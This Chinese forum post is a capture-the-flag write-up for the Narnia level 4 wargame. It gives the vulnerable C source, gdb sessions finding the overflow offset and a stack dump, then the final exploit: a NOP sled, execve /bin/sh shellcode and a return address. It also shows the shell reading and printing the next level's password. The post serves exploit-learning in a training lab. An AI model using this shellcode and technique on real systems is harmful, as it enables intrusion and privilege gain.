Narnia4源码如下
/* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA */ #include <string.h> #include <stdlib.h> #include <stdio.h> #include <ctype.h> extern char **environ; int main(int argc,char **argv){ int i; char buffer[256]; for(i = 0; environ[i] != NULL; i++) memset(environ[i], '\0', strlen(environ[i])); if(argc>1) strcpy(buffer,argv[1]); return 0; }
我死活没看懂这个for循环存在的意义在哪儿,因为这题和这个for循环一点儿关系都没有,这题的解法和narnia2的解法相同,也是利用nop滑板原理(因为没开NX),不过是对narnia2的复习罢了,不过还是要注意之前说的每16字节对齐的问题,调试结果如下
narnia4@narnia:/narnia$ gdb -q narnia4 Reading symbols from narnia4...(no debugging symbols found)...done. (gdb) r $(python -c 'print "\x90"*256+"\x43\x43\x43\x43"') Starting program: /narnia/narnia4 $(python -c 'print "\x90"*256+"\x43\x43\x43\x43"') [Inferior 1 (process 25347) exited normally] (gdb) r $(python -c 'print "\x90"*260+"\x43\x43\x43\x43"') Starting program: /narnia/narnia4 $(python -c 'print "\x90"*260+"\x43\x43\x43\x43"') Program received signal SIGSEGV, Segmentation fault. 0xf7e2a202 in __libc_start_main () from /lib32/libc.so.6 (gdb) r $(python -c 'print "\x90"*264+"\x43\x43\x43\x43"') The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /narnia/narnia4 $(python -c 'print "\x90"*264+"\x43\x43\x43\x43"') Program received signal SIGSEGV, Segmentation fault. 0x43434343 in ?? () (gdb)
果然只在256后面加跳转地址是不行的,需要再加8字节的对齐,跳转地址的寻找如下
(gdb) x/200x $esp 0xffffd5c0: 0x00000000 0xffffd654 0xffffd660 0x00000000 0xffffd5d0: 0x00000000 0x00000000 0xf7fc5000 0xf7ffdc0c 0xffffd5e0: 0xf7ffd000 0x00000000 0x00000002 0xf7fc5000 0xffffd5f0: 0x00000000 0x4d21e3f2 0x77ceefe2 0x00000000 0xffffd600: 0x00000000 0x00000000 0x00000002 0x080483b0 0xffffd610: 0x00000000 0xf7fee710 0xf7e2a199 0xf7ffd000 0xffffd620: 0x00000002 0x080483b0 0x00000000 0x080483d1 0xffffd630: 0x080484ab 0x00000002 0xffffd654 0x08048530 0xffffd640: 0x08048590 0xf7fe9070 0xffffd64c 0xf7ffd920 0xffffd650: 0x00000002 0xffffd785 0xffffd795 0x00000000 0xffffd660: 0xffffd8a2 0xffffd8b5 0xffffde71 0xffffdea8 0xffffd670: 0xffffdeb7 0xffffdec8 0xffffdedd 0xffffdeea 0xffffd680: 0xffffdef6 0xffffdeff 0xffffdf12 0xffffdf36 0xffffd690: 0xffffdf49 0xffffdf55 0xffffdf6c 0xffffdf7c 0xffffd6a0: 0xffffdf87 0xffffdf92 0xffffdf9a 0xffffdfaa 0xffffd6b0: 0x00000000 0x00000020 0xf7fd7c90 0x00000021 0xffffd6c0: 0xf7fd7000 0x00000010 0x178bfbff 0x00000006 0xffffd6d0: 0x00001000 0x00000011 0x00000064 0x00000003 0xffffd6e0: 0x08048034 0x00000004 0x00000020 0x00000005 0xffffd6f0: 0x00000008 0x00000007 0xf7fd9000 0x00000008 0xffffd700: 0x00000000 0x00000009 0x080483b0 0x0000000b 0xffffd710: 0x000036b4 0x0000000c 0x000036b4 0x0000000d 0xffffd720: 0x000036b4 0x0000000e 0x000036b4 0x00000017 0xffffd730: 0x00000001 0x00000019 0xffffd76b 0x0000001a 0xffffd740: 0x00000000 0x0000001f 0xffffdfe8 0x0000000f 0xffffd750: 0xffffd77b 0x00000000 0x00000000 0x00000000 0xffffd760: 0x00000000 0x00000000 0xc8000000 0x31785c54 0xffffd770: 0x1706d945 0xd327beb7 0x690e4282 0x00363836 0xffffd780: 0x00000000 0x616e2f00 0x61696e72 0x72616e2f 0xffffd790: 0x3461696e 0x90909000 0x90909090 0x90909090 0xffffd7a0: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd7b0: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd7c0: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd7d0: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd7e0: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd7f0: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd800: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd810: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd820: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd830: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd840: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd850: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd860: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd870: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd880: 0x90909090 0x90909090 0x90909090 0x90909090 0xffffd890: 0x90909090 0x90909090 0x90909090 0x43434390 0xffffd8a0: 0x00000043 0x00000000 0x00000000 0x00000000 0xffffd8b0: 0x00000000 0x00000000 0x00000000 0x00000000 0xffffd8c0: 0x00000000 0x00000000 0x00000000 0x00000000 0xffffd8d0: 0x00000000 0x00000000 0x00000000 0x00000000 (gdb)
在有90的位置随便选一个就行,不过记住地址中不能有00,不然会出现字符串截断,从而导致要跳转的地址出错,最终结果如下
narnia4@narnia:/narnia$ ./narnia4 $(python -c 'print "\x90"*226+"\xeb\x18\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x8d\x4e\x08\x89\x46\x0c\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"+"\x10\xd8\xff\xff"') $ whoami narnia5 $ cat /etc/narnia_pass/narnia5 faimahchiy $
小结
这篇我没看教程,果然这种东西都是先看教程然后就能形成自己的思维了么,不过不知道以后遇到别的类型的,还能不能搞出来
附件是可执行程序和源代码
文中shellcode的链接是之前的番外篇
最后于 20小时前 被pureGavin编辑 ,原因: 错字